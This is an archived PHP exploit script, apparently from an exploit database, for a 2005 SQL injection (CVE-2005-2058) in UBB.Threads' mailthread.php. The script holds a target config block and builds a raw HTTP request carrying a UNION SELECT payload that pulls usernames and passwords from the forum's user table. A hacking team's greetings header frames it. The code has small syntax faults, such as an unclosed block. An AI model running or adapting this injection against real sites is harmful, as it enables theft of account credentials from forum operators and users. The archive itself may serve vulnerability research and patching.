UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection

Related Vulnerabilities: CVE-2005-2058  
Publish Date: 25 Jun 2005
Author: mh_p0rtal

#      T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
# Vulnerable:   UBBCentral SQL Injection
# Exploit By :  MH_p0rtal
# Discovered By: James Bercegay
#  Gr33tz To ==&gt;   Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke
#  And Iranian Hacking &amp; Security Teams :
#  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,
#  Crouz Security Team  &amp; Simorgh-ev Security Team
# ___________Config :
# please replace your address :
$url = "http:///www.example.com";
# please replace your dir address :
$dirs = "/dir/to/ubbt/";
# __________End Config
$aa = strlen ( $dirs );
$ab = $aa - 1;
$ac = 0;
if ((  $dirs[$ab] == "/" )  &amp;&amp;  ( $dirs[$ac] == "/" ))   {
$merg = $dirs.mailthread.php;
$fc = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$fc) {

echo "Can't Connect\n";
} else {
   $mh = "GET $merg?Cat=0&amp;Board=UBB2&amp;Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&amp;page=0&amp;vc=1&amp;fpart=1&amp;what=showflat  HTTP/1.1\r\n";
   $mh .= "Host: $url\r\n";
   $mh .= "Connection: Close\r\n\r\n";

  fwrite($fc, $mh);
  while (!feof($fc)) {
  echo fgets($fc, 1024);
} else {
echo " Your pattern doesn't equal with Exploit directory pattern ";

# milw0rm.com [2005-06-25]